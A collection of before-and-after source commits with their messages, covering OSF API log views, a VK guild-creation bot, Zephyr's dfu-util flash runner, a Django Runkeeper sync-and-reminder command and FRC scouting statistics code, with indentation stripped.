OSF Node entities have the "nodes" `type`.
name type description
---------------------------------------------------------------------------------
title string title of project or component
description string description of the node
category string node category, must be one of the allowed values
date_created iso8601 timestamp timestamp that the node was created
date_modified iso8601 timestamp timestamp when the node was last updated
tags array of strings list of tags that describe the node
registration boolean has this project been registered?
collection boolean is this node a collection of other nodes?
dashboard boolean is this node visible on the user dashboard?
public boolean has this node been made publicly-visible?
##Links
See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).
##Actions
*None*.
##Query Params
+ `page=<Int>` -- page number of results to view, default 1
+ `filter[<fieldname>]=<Str>` -- fields and values to filter the search results on.
<!--- Copied Query Params from NodeList -->
Nodes may be filtered by their `title`, `category`, `description`, `public`, `registration`, or `tags`. `title`,
`description`, and `category` are string fields and will be filtered using simple substring matching. `public` and
`registration` are booleans, and can be filtered using truthy values, such as `true`, `false`, `0`, or `1`. Note
that quoting `true` or `false` in the query will cause the match to fail regardless. `tags` is an array of simple strings.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.NODE_LOG_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = NodeSerializer
view_category = 'logs'
view_name = 'log-nodes'
order = ('-date', )
def get_queryset(self):
log = NodeLog.load(self.kwargs.get('log_id'))
if not log:
raise NotFound(
detail='No log matching that log_id could be found.'
)
else:
auth_user = get_user_auth(self.request)
return [
node for node in log.node__logged
if node.can_view(auth_user)
]
class NodeLogDetail(JSONAPIBaseView, generics.RetrieveAPIView):
"""List of nodes that a given log is associated with. *Read-only*.
Paginated list of nodes that the user contributes to. Each resource contains the full representation of the node,
meaning additional requests to an individual node's detail view are not necessary. If the user id in the path is the
same as the logged-in user, all nodes will be visible. Otherwise, you will only be able to see the other user's
publicly-visible nodes. The special user id `me` can be used to represent the currently logged-in user.
Note that if an anonymous view_only key is being used, the user relationship will not be exposed.
##Node Attributes
<!--- Copied Attributes from NodeDetail -->
OSF Node entities have the "nodes" `type`.
name type description
---------------------------------------------------------------------------------
title string title of project or component
description string description of the node
category string node category, must be one of the allowed values
date_created iso8601 timestamp timestamp that the node was created
date_modified iso8601 timestamp timestamp when the node was last updated
tags array of strings list of tags that describe the node
registration boolean has this project been registered?
collection boolean is this node a collection of other nodes?
dashboard boolean is this node visible on the user dashboard?
public boolean has this node been made publicly-visible?
##Links
See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).
##Actions
*None*.
##Query Params
+ `page=<Int>` -- page number of results to view, default 1
+ `filter[<fieldname>]=<Str>` -- fields and values to filter the search results on.
<!--- Copied Query Params from NodeList -->
Nodes may be filtered by their `title`, `category`, `description`, `public`, `registration`, or `tags`. `title`,
`description`, and `category` are string fields and will be filtered using simple substring matching. `public` and
`registration` are booleans, and can be filtered using truthy values, such as `true`, `false`, `0`, or `1`. Note
that quoting `true` or `false` in the query will cause the match to fail regardless. `tags` is an array of simple strings.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.NODE_BASE_READ]
required_write_scopes = [CoreScopes.NODE_BASE_WRITE]
serializer_class = NodeLogSerializer
view_category = 'logs'
view_name = 'log-detail'
# overrides RetrieveUpdateDestroyAPIView
def get_object(self):
log = get_object_or_error(
NodeLog,
self.kwargs['log_id'],
display_name='log'
)
# May raise a permission denied
self.check_object_permissions(self.request, log)
return log
# overrides RetrieveUpdateDestroyAPIView
def perform_destroy(self, instance):
pass
Add LogMixin for either getting the log or raising NotFound.
from rest_framework import generics, permissions as drf_permissions
from rest_framework.exceptions import NotFound
from website.models import NodeLog
from framework.auth.oauth_scopes import CoreScopes
from api.base.filters import ODMFilterMixin
from api.base.utils import get_user_auth, get_object_or_error
from api.base import permissions as base_permissions
from api.nodes.serializers import NodeSerializer
from api.users.serializers import UserSerializer
from api.logs.serializers import NodeLogSerializer
from api.base.views import JSONAPIBaseView
class LogMixin(object):
"""
Mixin with convenience method get_log
"""
def get_log(self):
log = NodeLog.load(self.kwargs.get('log_id'))
if not log:
raise NotFound(
detail='No log matching that log_id could be found.'
)
return log
class LogNodeList(JSONAPIBaseView, generics.ListAPIView, ODMFilterMixin):
"""List of nodes that a given log is associated with. *Read-only*.
Paginated list of nodes that the user contributes to. Each resource contains the full representation of the node,
meaning additional requests to an individual node's detail view are not necessary. If the user id in the path is the
same as the logged-in user, all nodes will be visible. Otherwise, you will only be able to see the other user's
publicly-visible nodes. The special user id `me` can be used to represent the currently logged-in user.
##Node Attributes
<!--- Copied Attributes from NodeDetail -->
OSF Node entities have the "nodes" `type`.
name type description
---------------------------------------------------------------------------------
title string title of project or component
description string description of the node
category string node category, must be one of the allowed values
date_created iso8601 timestamp timestamp that the node was created
date_modified iso8601 timestamp timestamp when the node was last updated
tags array of strings list of tags that describe the node
registration boolean has this project been registered?
collection boolean is this node a collection of other nodes?
dashboard boolean is this node visible on the user dashboard?
public boolean has this node been made publicly-visible?
##Links
See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).
##Actions
*None*.
##Query Params
+ `page=<Int>` -- page number of results to view, default 1
+ `filter[<fieldname>]=<Str>` -- fields and values to filter the search results on.
<!--- Copied Query Params from NodeList -->
Nodes may be filtered by their `title`, `category`, `description`, `public`, `registration`, or `tags`. `title`,
`description`, and `category` are string fields and will be filtered using simple substring matching. `public` and
`registration` are booleans, and can be filtered using truthy values, such as `true`, `false`, `0`, or `1`. Note
that quoting `true` or `false` in the query will cause the match to fail regardless. `tags` is an array of simple strings.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.NODE_LOG_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = NodeSerializer
view_category = 'logs'
view_name = 'log-nodes'
order = ('-date', )
def get_queryset(self):
log = NodeLog.load(self.kwargs.get('log_id'))
if not log:
raise NotFound(
detail='No log matching that log_id could be found.'
)
else:
auth_user = get_user_auth(self.request)
return [
node for node in log.node__logged
if node.can_view(auth_user)
]
class NodeLogDetail(JSONAPIBaseView, generics.RetrieveAPIView):
"""List of nodes that a given log is associated with. *Read-only*.
Paginated list of nodes that the user contributes to. Each resource contains the full representation of the node,
meaning additional requests to an individual node's detail view are not necessary. If the user id in the path is the
same as the logged-in user, all nodes will be visible. Otherwise, you will only be able to see the other user's
publicly-visible nodes. The special user id `me` can be used to represent the currently logged-in user.
Note that if an anonymous view_only key is being used, the user relationship will not be exposed.
##Node Attributes
<!--- Copied Attributes from NodeDetail -->
OSF Node entities have the "nodes" `type`.
name type description
---------------------------------------------------------------------------------
title string title of project or component
description string description of the node
category string node category, must be one of the allowed values
date_created iso8601 timestamp timestamp that the node was created
date_modified iso8601 timestamp timestamp when the node was last updated
tags array of strings list of tags that describe the node
registration boolean has this project been registered?
collection boolean is this node a collection of other nodes?
dashboard boolean is this node visible on the user dashboard?
public boolean has this node been made publicly-visible?
##Links
See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).
##Actions
*None*.
##Query Params
+ `page=<Int>` -- page number of results to view, default 1
+ `filter[<fieldname>]=<Str>` -- fields and values to filter the search results on.
<!--- Copied Query Params from NodeList -->
Nodes may be filtered by their `title`, `category`, `description`, `public`, `registration`, or `tags`. `title`,
`description`, and `category` are string fields and will be filtered using simple substring matching. `public` and
`registration` are booleans, and can be filtered using truthy values, such as `true`, `false`, `0`, or `1`. Note
that quoting `true` or `false` in the query will cause the match to fail regardless. `tags` is an array of simple strings.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.NODE_BASE_READ]
required_write_scopes = [CoreScopes.NODE_BASE_WRITE]
serializer_class = NodeLogSerializer
view_category = 'logs'
view_name = 'log-detail'
# overrides RetrieveUpdateDestroyAPIView
def get_object(self):
log = get_object_or_error(
NodeLog,
self.kwargs['log_id'],
display_name='log'
)
# May raise a permission denied
self.check_object_permissions(self.request, log)
return log
# overrides RetrieveUpdateDestroyAPIView
def perform_destroy(self, instance):
pass
|
""" Создание гильдий """
from lib.object_creation import createGuild
from lib.guilds import Player, Guild
from lib.commands import ban_list
from lib.config import group_id
from topics.lib import Hyperlink, getPhoto, Fields
from topics.errors import GMError
from re import search
id = 29891323
group = group_id
comment_amount = 5
def getAction(text):
return makeGuild
def getResponse(request):
player = Player(request.asker.get("id"))
guild_name, page_id = player.guild.get("name", "page")
link = "https://vk.com/page-{}_{}".format(group_id, page_id)
return "Гильдия: {} ({})".format(guild_name, link)
def finish(request):
pass
def makeGuild(request):
mandatory_keys, optional_keys = getKeys()
fields = Fields(request.text, mandatory_keys, optional_keys)
editFields(fields)
makeHyperlinks(fields)
editHeadsAndVices(fields)
if not guildAlreadyExists(fields):
checkGuildInfo(fields)
createGuild(**fields)
def getKeys():
mandatory_keys = {
"баннер":"banner", "название":"name", "глава":"head",
"состав":"players", "требования":"requirements",
"описание":"about", "баннер":"banner", "лого":"logo"}
optional_keys = {"зам":"vice",}
return mandatory_keys, optional_keys
def editFields(fields):
fields['banner'] = getPhoto(fields['banner'])
fields['logo'] = getPhoto(fields['logo'])
def makeHyperlinks(guild):
fields = ("head", "vice", "players")
for field in fields:
players = guild[field].strip().split(" ")
guild[field] = [Hyperlink(p) for p in players]
def editHeadsAndVices(guild):
fields = ("head", "vice")
for field in fields:
players = guild[field]
players = [p.id for p in players]
guild[field] = " ".join(players)
def checkGuildInfo(guild):
checkPlayers(guild['players'])
checkGuildName(guild['name'])
checkIfHeadsVicesInGuild(guild)
def checkPlayers(players):
checkNumberOfPlayers(players)
for player in players:
checkPlayerUniqueness(player)
checkIfPlayerHasGuild(player)
checkIfPlayerInBan(player)
def checkNumberOfPlayers(players):
if len(players) < 5:
raise GMError("В гильдии меньше 5 игроков.")
def checkPlayerUniqueness(player):
old_player = Player(name=player.name)
if old_player.exists and old_player.get("id") != player.id:
name = player.name
id = old_player.get("id")
raise GMError("Игрок с ником {} уже [id{}|существует]".format(name, id))
def checkIfPlayerHasGuild(hyperlink):
player = Player(hyperlink.id)
if player.rank > 0:
guild_name = player.guild.get("name")
raise GMError("{} уже состоит в гильдии {}".format(hyperlink, guild_name))
def checkIfPlayerInBan(player):
if int(player.id) in ban_list:
raise GMError("{} забанен в группе.".format(player))
def checkGuildName(guild_name):
pattern = r"^[\[\]A-Za-z_\d ]+$"
if search(pattern, guild_name) is None:
raise GMError("Название гильдии содержит недопустимые символы.")
elif Guild(name=guild_name).exists:
raise GMError("Гильдия с таким названием уже существует.")
def checkIfHeadsVicesInGuild(guild):
heads = guild['head'].split(" ")
vices = guild['vice'].split(" ")
for player in guild['players']:
if player.id in heads:
heads.remove(player.id)
elif player.id in vices:
vices.remove(player.id)
if len(heads) or len(vices):
raise GMError("Не все заместители/главы находятся в составе гильдии.")
def guildAlreadyExists(guild):
name = guild['name']
head = guild['head']
old_guild = Guild(name=name)
if old_guild.exists:
if old_guild.get("head") == head:
return True
[fix] stripping each separate hyperlink to prevent errors
""" Создание гильдий """
from lib.object_creation import createGuild
from lib.guilds import Player, Guild
from lib.commands import ban_list
from lib.config import group_id
from topics.lib import Hyperlink, getPhoto, Fields
from topics.errors import GMError
from re import search
id = 29891323
group = group_id
comment_amount = 5
def getAction(text):
return makeGuild
def getResponse(request):
player = Player(request.asker.get("id"))
guild_name, page_id = player.guild.get("name", "page")
link = "https://vk.com/page-{}_{}".format(group_id, page_id)
return "Гильдия: {} ({})".format(guild_name, link)
def finish(request):
pass
def makeGuild(request):
mandatory_keys, optional_keys = getKeys()
fields = Fields(request.text, mandatory_keys, optional_keys)
editFields(fields)
makeHyperlinks(fields)
editHeadsAndVices(fields)
if not guildAlreadyExists(fields):
checkGuildInfo(fields)
createGuild(**fields)
def getKeys():
mandatory_keys = {
"баннер":"banner", "название":"name", "глава":"head",
"состав":"players", "требования":"requirements",
"описание":"about", "баннер":"banner", "лого":"logo"}
optional_keys = {"зам":"vice",}
return mandatory_keys, optional_keys
def editFields(fields):
fields['banner'] = getPhoto(fields['banner'])
fields['logo'] = getPhoto(fields['logo'])
def makeHyperlinks(guild):
fields = ("head", "vice", "players")
for field in fields:
players = guild[field]
players = players.strip().split(" ")
guild[field] = [Hyperlink(p.strip()) for p in players]
def editHeadsAndVices(guild):
fields = ("head", "vice")
for field in fields:
players = guild[field]
players = [p.id for p in players]
guild[field] = " ".join(players)
def checkGuildInfo(guild):
checkPlayers(guild['players'])
checkGuildName(guild['name'])
checkIfHeadsVicesInGuild(guild)
def checkPlayers(players):
checkNumberOfPlayers(players)
for player in players:
checkPlayerUniqueness(player)
checkIfPlayerHasGuild(player)
checkIfPlayerInBan(player)
def checkNumberOfPlayers(players):
if len(players) < 5:
raise GMError("В гильдии меньше 5 игроков.")
def checkPlayerUniqueness(player):
old_player = Player(name=player.name)
if old_player.exists and old_player.get("id") != player.id:
name = player.name
id = old_player.get("id")
raise GMError("Игрок с ником {} уже [id{}|существует]".format(name, id))
def checkIfPlayerHasGuild(hyperlink):
player = Player(hyperlink.id)
if player.rank > 0:
guild_name = player.guild.get("name")
raise GMError("{} уже состоит в гильдии {}".format(hyperlink, guild_name))
def checkIfPlayerInBan(player):
if int(player.id) in ban_list:
raise GMError("{} забанен в группе.".format(player))
def checkGuildName(guild_name):
pattern = r"^[\[\]A-Za-z_\d ]+$"
if search(pattern, guild_name) is None:
raise GMError("Название гильдии содержит недопустимые символы.")
elif Guild(name=guild_name).exists:
raise GMError("Гильдия с таким названием уже существует.")
def checkIfHeadsVicesInGuild(guild):
heads = guild['head'].split(" ")
vices = guild['vice'].split(" ")
for player in guild['players']:
if player.id in heads:
heads.remove(player.id)
elif player.id in vices:
vices.remove(player.id)
if len(heads) or len(vices):
raise GMError("Не все заместители/главы находятся в составе гильдии.")
def guildAlreadyExists(guild):
name = guild['name']
head = guild['head']
old_guild = Guild(name=name)
if old_guild.exists:
if old_guild.get("head") == head:
return True
|
# Copyright (c) 2017 Linaro Limited.
#
# SPDX-License-Identifier: Apache-2.0
'''Runner for flashing with dfu-util.'''
from collections import namedtuple
import sys
import time
from runners.core import ZephyrBinaryRunner, RunnerCaps, \
BuildConfiguration
DfuSeConfig = namedtuple('DfuSeConfig', ['address', 'options'])
class DfuUtilBinaryRunner(ZephyrBinaryRunner):
'''Runner front-end for dfu-util.'''
def __init__(self, cfg, pid, alt, img, exe='dfu-util',
dfuse_config=None):
super(DfuUtilBinaryRunner, self).__init__(cfg)
self.alt = alt
self.img = img
self.cmd = [exe, '-d,{}'.format(pid)]
try:
self.list_pattern = ', alt={},'.format(int(self.alt))
except ValueError:
self.list_pattern = ', name="{}",'.format(self.alt)
if dfuse_config is None:
self.dfuse = False
else:
self.dfuse = True
self.dfuse_config = dfuse_config
self.reset = False
@classmethod
def name(cls):
return 'dfu-util'
@classmethod
def capabilities(cls):
return RunnerCaps(commands={'flash'}, flash_addr=True)
@classmethod
def do_add_parser(cls, parser):
# Required:
parser.add_argument("--pid", required=True,
help="USB VID:PID of the board")
parser.add_argument("--alt", required=True,
help="interface alternate setting number or name")
# Optional:
parser.add_argument("--img",
help="binary to flash, default is --bin-file")
parser.add_argument("--dfuse", default=False, action='store_true',
help='''set if target is a DfuSe device;
implies --dt-flash.''')
parser.add_argument("--dfuse-modifiers", default='leave',
help='''colon-separated list of DfuSe modifiers
(default is "leave", which starts execution
immediately); --dfuse must also be given for this
option to take effect.''')
parser.add_argument('--dfu-util', default='dfu-util',
help='dfu-util executable; defaults to "dfu-util"')
@classmethod
def create(cls, cfg, args):
if args.img is None:
args.img = cfg.bin_file
if args.dfuse:
args.dt_flash = True # --dfuse implies --dt-flash.
build_conf = BuildConfiguration(cfg.build_dir)
dcfg = DfuSeConfig(address=cls.get_flash_address(args, build_conf),
options=args.dfuse_modifiers)
else:
dcfg = None
ret = DfuUtilBinaryRunner(cfg, args.pid, args.alt, args.img,
exe=args.dfu_util, dfuse_config=dcfg)
ret.ensure_device()
return ret
def ensure_device(self):
if not self.find_device():
self.reset = True
print('Please reset your board to switch to DFU mode...')
while not self.find_device():
time.sleep(0.1)
def find_device(self):
cmd = list(self.cmd) + ['-l']
output = self.check_output(cmd)
output = output.decode(sys.getdefaultencoding())
return self.list_pattern in output
def do_run(self, command, **kwargs):
self.require(self.cmd[0])
if not self.find_device():
raise RuntimeError('device not found')
cmd = list(self.cmd)
if self.dfuse:
# http://dfu-util.sourceforge.net/dfuse.html
dcfg = self.dfuse_config
addr_opts = hex(dcfg.address) + ':' + dcfg.options
cmd.extend(['-s', addr_opts])
cmd.extend(['-a', self.alt, '-D', self.img])
self.check_call(cmd)
if self.dfuse and 'leave' in dcfg.options.split(':'):
# Normal DFU devices generally need to be reset to switch
# back to the flashed program.
#
# DfuSe targets do as well, except when 'leave' is given
# as an option.
self.reset = False
if self.reset:
print('Now reset your board again to switch back to runtime mode.')
doc: improve west flash help for dfu-util
Try to make it clearer what's going on here.
Suggested-by: Lucian Copeland <b8598f89a69388d99afadf563d2cc1e4211e452f@gmail.com>
Signed-off-by: Martí Bolívar <9d90ac4c7bf6a305f6bfd81a23c7859bc883380e@nordicsemi.no>
# Copyright (c) 2017 Linaro Limited.
#
# SPDX-License-Identifier: Apache-2.0
'''Runner for flashing with dfu-util.'''
from collections import namedtuple
import sys
import time
from runners.core import ZephyrBinaryRunner, RunnerCaps, \
BuildConfiguration
DfuSeConfig = namedtuple('DfuSeConfig', ['address', 'options'])
class DfuUtilBinaryRunner(ZephyrBinaryRunner):
'''Runner front-end for dfu-util.'''
def __init__(self, cfg, pid, alt, img, exe='dfu-util',
dfuse_config=None):
super(DfuUtilBinaryRunner, self).__init__(cfg)
self.alt = alt
self.img = img
self.cmd = [exe, '-d,{}'.format(pid)]
try:
self.list_pattern = ', alt={},'.format(int(self.alt))
except ValueError:
self.list_pattern = ', name="{}",'.format(self.alt)
if dfuse_config is None:
self.dfuse = False
else:
self.dfuse = True
self.dfuse_config = dfuse_config
self.reset = False
@classmethod
def name(cls):
return 'dfu-util'
@classmethod
def capabilities(cls):
return RunnerCaps(commands={'flash'}, flash_addr=True)
@classmethod
def do_add_parser(cls, parser):
# Required:
parser.add_argument("--pid", required=True,
help="USB VID:PID of the board")
parser.add_argument("--alt", required=True,
help="interface alternate setting number or name")
# Optional:
parser.add_argument("--img",
help="binary to flash, default is --bin-file")
parser.add_argument("--dfuse", default=False, action='store_true',
help='''use the DfuSe protocol extensions
supported by STMicroelectronics
devices (if given, the image flash
address respects
CONFIG_FLASH_BASE_ADDRESS and
CONFIG_FLASH_LOAD_OFFSET)''')
parser.add_argument("--dfuse-modifiers", default='leave',
help='''colon-separated list of additional
DfuSe modifiers for dfu-util's -s
option (default is
"-s <flash-address>:leave", which starts
execution immediately); requires
--dfuse
''')
parser.add_argument('--dfu-util', default='dfu-util',
help='dfu-util executable; defaults to "dfu-util"')
@classmethod
def create(cls, cfg, args):
if args.img is None:
args.img = cfg.bin_file
if args.dfuse:
args.dt_flash = True # --dfuse implies --dt-flash.
build_conf = BuildConfiguration(cfg.build_dir)
dcfg = DfuSeConfig(address=cls.get_flash_address(args, build_conf),
options=args.dfuse_modifiers)
else:
dcfg = None
ret = DfuUtilBinaryRunner(cfg, args.pid, args.alt, args.img,
exe=args.dfu_util, dfuse_config=dcfg)
ret.ensure_device()
return ret
def ensure_device(self):
if not self.find_device():
self.reset = True
print('Please reset your board to switch to DFU mode...')
while not self.find_device():
time.sleep(0.1)
def find_device(self):
cmd = list(self.cmd) + ['-l']
output = self.check_output(cmd)
output = output.decode(sys.getdefaultencoding())
return self.list_pattern in output
def do_run(self, command, **kwargs):
self.require(self.cmd[0])
if not self.find_device():
raise RuntimeError('device not found')
cmd = list(self.cmd)
if self.dfuse:
# http://dfu-util.sourceforge.net/dfuse.html
dcfg = self.dfuse_config
addr_opts = hex(dcfg.address) + ':' + dcfg.options
cmd.extend(['-s', addr_opts])
cmd.extend(['-a', self.alt, '-D', self.img])
self.check_call(cmd)
if self.dfuse and 'leave' in dcfg.options.split(':'):
# Normal DFU devices generally need to be reset to switch
# back to the flashed program.
#
# DfuSe targets do as well, except when 'leave' is given
# as an option.
self.reset = False
if self.reset:
print('Now reset your board again to switch back to runtime mode.')
|
from django.core.management.base import BaseCommand, CommandError
from django.core.mail import send_mail
from Running.models import User, Run
import requests
import json
import datetime
import time
class Command(BaseCommand):
help = 'Updates the runs of all users that have registered with runkeeper'
# def add_arguments(self, parser):
# parser.add_argument('poll_id', nargs='+', type=int)
def handle(self, *args, **options):
if datetime.datetime.today().weekday() == 0:
users_with_tokens = User.objects.exclude(access_token="")
for user in users_with_tokens:
r = requests.get('https://api.runkeeper.com/fitnessActivities', headers={'Authorization': 'Bearer %s' % user.access_token})
data = r.json()
print data['items']
for item in data['items']:
print item['total_distance']
runkeeper_runs = user.runs.filter(source="runkeeper")
registered_ids = [run.source_id for run in runkeeper_runs]
for item in data['items']:
if item['uri'] not in registered_ids:
date = time.strptime(item['start_time'][5:16], "%d %b %Y")
date = datetime.datetime(*date[:6]).date()
new_run = Run(runner=user, distance=item['total_distance']/1000, start_date=date, end_date=date, source="runkeeper", source_id=item['uri'])
new_run.save()
self.stdout.write('Successfully updated runs')
everyone_else = User.objects.filter(access_token="")
all_addresses = []
for user in everyone_else:
if user.email != None:
all_addresses += [user.email]
all_addresses = [i for i in all_addresses if i != '']
print all_addresses
send_mail('Reminder',
'Hello! Since you\'re not using runkeeper to automatically keep your runs updated, you should probably enter your runs on Masanga Runners!' ,
'postmaster@appa4d174eb9b61497e90a286ddbbc6ef57.mailgun.org',
all_addresses[1:],
fail_silently=False)
self.stdout.write('Sent reminder mail')
[Changes] syncallrunsandremind to send out many emails
Before, syncallrunsandremind would send out one mass email. Now, it
sends out one email to each person.
from django.core.management.base import BaseCommand, CommandError
from django.core.mail import send_mail
from Running.models import User, Run
import requests
import json
import datetime
import time
class Command(BaseCommand):
help = 'Updates the runs of all users that have registered with runkeeper'
# def add_arguments(self, parser):
# parser.add_argument('poll_id', nargs='+', type=int)
def handle(self, *args, **options):
if datetime.datetime.today().weekday() == 0:
users_with_tokens = User.objects.exclude(access_token="")
for user in users_with_tokens:
r = requests.get('https://api.runkeeper.com/fitnessActivities', headers={'Authorization': 'Bearer %s' % user.access_token})
data = r.json()
print data['items']
for item in data['items']:
print item['total_distance']
runkeeper_runs = user.runs.filter(source="runkeeper")
registered_ids = [run.source_id for run in runkeeper_runs]
for item in data['items']:
if item['uri'] not in registered_ids:
date = time.strptime(item['start_time'][5:16], "%d %b %Y")
date = datetime.datetime(*date[:6]).date()
new_run = Run(runner=user, distance=item['total_distance']/1000, start_date=date, end_date=date, source="runkeeper", source_id=item['uri'])
new_run.save()
self.stdout.write('Successfully updated runs')
everyone_else = User.objects.filter(access_token="")
all_addresses = []
for user in everyone_else:
if user.email != None:
all_addresses += [user.email]
all_addresses = [i for i in all_addresses if i != '']
for address in all_addresses:
if address:
send_mail('Reminder',
'Hello! Since you\'re not using runkeeper to automatically keep your runs updated, you should probably enter your runs on Masanga Runners!' ,
'postmaster@appa4d174eb9b61497e90a286ddbbc6ef57.mailgun.org',
[address],
fail_silently=False)
self.stdout.write('Sent reminder mail') |
from BaseScouting.views.base_views import BaseHomepageView, BaseAllTeamsViews,\
BaseAllMatchesView, BaseSingleTeamView
from Scouting2017.model.reusable_models import Competition, TeamCompetesIn, Match, OfficialMatch, Team, TeamPictures, TeamComments
from Scouting2017.model.models2017 import get_team_metrics, ScoreResult
import math
class HomepageView2017(BaseHomepageView):
def __init__(self):
BaseHomepageView.__init__(self, Competition, 'Scouting2017/index.html')
def get_our_metrics(self):
return []
def get_competition_metrics(self, competition):
output = []
return output
class AllTeamsViews2017(BaseAllTeamsViews):
def __init__(self):
BaseAllTeamsViews.__init__(self, TeamCompetesIn, 'Scouting2017/all_teams.html')
def get_metrics_for_team(self, team):
return get_team_metrics(team)
def get_context_data(self, **kwargs):
context = BaseAllTeamsViews.get_context_data(self, **kwargs)
context['statistics'] = self.get_statistics(kwargs['regional_code'])
class AllMatchesViews2017(BaseAllMatchesView):
def __init__(self):
BaseAllMatchesView.__init__(self, Match, OfficialMatch, 'Scouting2017/allmatches.html')
class SingleTeamView2017(BaseSingleTeamView):
def __init__(self):
BaseSingleTeamView.__init__(self, Team, TeamPictures, TeamComments, 'Scouting2017/view_team.html')
def get_metrics(self, team):
return []
'''
When get_statistics() function is called, it grabs live data from all the teams and all their score results.
It then will use that data to determine a mean and SAMPLE standard deviation for bots' gears,fuel,and rope capabilities.
get_statistics() will also calculate z-scores along the SSD for those elements and store them in the model to be called later.
NOTE: Sample standard deviation is used when you do not have the full data set, so I believe it is appropriate to use here.
'''
def get_statistics(self, regional_code):
competition_srs = ScoreResult.objects.filter(competition__code=regional_code)
teams_at_competition = TeamCompetesIn.objects.filter(competition__code=regional_code)
metrics = get_team_metrics(teams_at_competition)
# black magic grabs all the metrics for every team with metrics.
global_gear_sum = 0 # summation used to find global_gear_avg
teams_with_gears = 0 #counter variable
for team in metrics:
global_gear_sum.join(team.gears_score__avg)
teams_with_gears += 1
if teams_with_gears==0: # Divide by 0 should not happen.
global_gear_avg = 'NA'
else:
global_gear_avg = global_gear_sum/(teams_with_gears) # X-bar (Mean) for gears.
# the above for loop will grab all the team's score results, and average them all together.
print global_gear_avg
teams_with_gears = 0 # Reset counter variable
sum_v_squared = 0
for team in teams_at_competition: # Finds the standard deviation
sum_v_squared.join((team.gears_score__avg - global_gear_avg)**2) #Obtains a variance, squares it, and ads it to a sum.
teams_with_gears += 1
if teams_with_gears==1: # Divide by 0 should not happen. Is == 1 because SSD requires dividing by N-1, so having exactly 1 score result would break this.
st_dev_gear = 'NA'
else:
st_dev_gear = math.sqrt(sum_v_squared / (teams_with_gears-1)) # Standard deviation for gears.
print st_dev_gear
gear_stat_z = 0
for team in teams_at_competition: # Finds Z-scores and ads them to each team's model.
variance = (team.gears_score__avg - global_gear_avg)
#gear_stat_z = variance/st_dev_gear
# this is commented until we figure out how to add it to the model
It probably works. Merging with main to find out if I am wrong.
from BaseScouting.views.base_views import BaseHomepageView, BaseAllTeamsViews,\
BaseAllMatchesView, BaseSingleTeamView
from Scouting2017.model.reusable_models import Competition, TeamCompetesIn, Match, OfficialMatch, Team, TeamPictures, TeamComments
from Scouting2017.model.models2017 import get_team_metrics, ScoreResult
from django.db.models.aggregates import Avg
import math
class HomepageView2017(BaseHomepageView):
def __init__(self):
BaseHomepageView.__init__(self, Competition, 'Scouting2017/index.html')
def get_our_metrics(self):
return []
def get_competition_metrics(self, competition):
output = []
return output
class AllTeamsViews2017(BaseAllTeamsViews):
def __init__(self):
BaseAllTeamsViews.__init__(self, TeamCompetesIn, 'Scouting2017/all_teams.html')
def get_metrics_for_team(self, team):
return get_team_metrics(team)
def get_context_data(self, **kwargs):
context = BaseAllTeamsViews.get_context_data(self, **kwargs)
reg_code = kwargs['regional_code']
get_statistics(reg_code,context['teams'])
for team in context['teams']:
print team.teamNumber, team.gear_z, team.fuel_z
class AllMatchesViews2017(BaseAllMatchesView):
def __init__(self):
BaseAllMatchesView.__init__(self, Match, OfficialMatch, 'Scouting2017/allmatches.html')
class SingleTeamView2017(BaseSingleTeamView):
def __init__(self):
BaseSingleTeamView.__init__(self, Team, TeamPictures, TeamComments, 'Scouting2017/view_team.html')
def get_metrics(self, team):
return []
'''
When get_statistics() function is called, it grabs live data from all the teams and all their score results.
It then will use that data to determine a mean and SAMPLE standard deviation for bots' gears,fuel,and rope capabilities.
get_statistics() will also calculate z-scores along the SSD for those elements and store them in the model to be called later.
NOTE: Sample standard deviation is used when you do not have the full data set, so I believe it is appropriate to use here.
'''
def get_statistics(self, regional_code):
competition_srs = ScoreResult.objects.filter(competition__code=regional_code)
teams_at_competition = TeamCompetesIn.objects.filter(competition__code=regional_code)
metrics = get_team_metrics(teams_at_competition)
# black magic grabs all the metrics for every team with metrics.
competition_averages = competition_srs.aggregate(Avg('gears_score'),
Avg('fuel_score_hi'),
Avg('fuel_score_hi_auto'),
Avg('fuel_score_low'),
Avg('fuel_score_low_auto'))
gear_avg = competition_averages['gears_score']
fuel_avg = competition_averages['fuel_score_hi_auto'] + (competition_averages['fuel_score_hi'] / 3 ) + (competition_averages['fuel_score_low_auto'] / 3) + (competition_averages['fuel_score_low'] / 9)
gear_v2 = 0
fuel_v2 = 0
num_srs = 0
for sr in competition_srs:
sr_gear = sr.gears_score - gear_avg
sr_fuel = ((sr.fuel_score_hi_auto)+(sr.fuel_score_hi / 3) + (sr.fuel_score_low_auto / 3) + (sr.fuel_score_low / 9)) - fuel_avg
gear_v2 += sr_gear * sr_gear
fuel_v2 += gear_avg * gear_avg
num_srs += 1
gear_stdev = math.sqrt(gear_v2/num_srs)
fuel_stdev = math.sqrt(fuel_v2/num_srs)
print gear_stdev,fuel_stdev
for team in teams_at_competition:
teams_srs = team.scoreresult_set.filter(competition_code=regional_code)
team_avgs = teams_srs.aggregate(Avg('gears_score'),
Avg('fuel_score_hi'),
Avg('fuel_score_hi_auto'),
Avg('fuel_score_low'),
Avg('fuel_score_low_auto'))
team.fuel_z = 'NA'
if len(teams_srs)!= 0:
team.gear_z = team.gears_score__avg / gear_stdev
team.fuel_z = ((team.fuel_score_hi_auto__avg) + (team.fuel_score_hi__avg / 3) + (team.fuel_score_low_auto__avg / 3) + (team.fuel_score_low__avg / 9)) / fuel_stdev |
'''
ARCHES - a program developed to inventory and manage immovable cultural heritage.
Copyright (C) 2013 J. Paul Getty Trust and World Monuments Fund
